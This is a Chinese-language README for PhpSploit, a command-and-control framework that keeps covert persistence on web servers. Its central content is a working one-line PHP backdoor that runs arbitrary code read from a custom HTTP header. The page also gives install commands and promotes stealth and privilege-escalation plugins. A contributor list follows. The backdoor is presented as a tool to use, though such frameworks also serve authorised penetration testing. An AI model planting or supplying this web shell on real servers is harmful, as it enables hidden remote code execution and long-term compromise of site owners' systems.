
功能全面的C2框架,通过单行PHP后门在Web服务器上静默持久化。
通过标准客户端请求与Web服务器相对响应中的HTTP头实现混淆通信,隧道经由一个微型多态后门:
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
git clone https://github.com/nil0x42/phpsploit
cd phpsploit/
pip3 install -r requirements.txt
./phpsploit --interactive --eval "help help"
高效:超过20个插件用于自动化权限提升任务
隐秘:该框架由偏执者为偏执者打造
便捷:稳健的界面,具有许多关键功能
help命令)感谢以下出色的人们:
本项目遵循 all-contributors 规范。欢迎任何形式的贡献。
![]() Sujit Ghosal 📝 |
![]() Zerdoumi 🐛 |
![]() tristandostaler 🐛 | ![]() Rohan Tarai 🐛 | ![]() Jonas Lejon 📝 |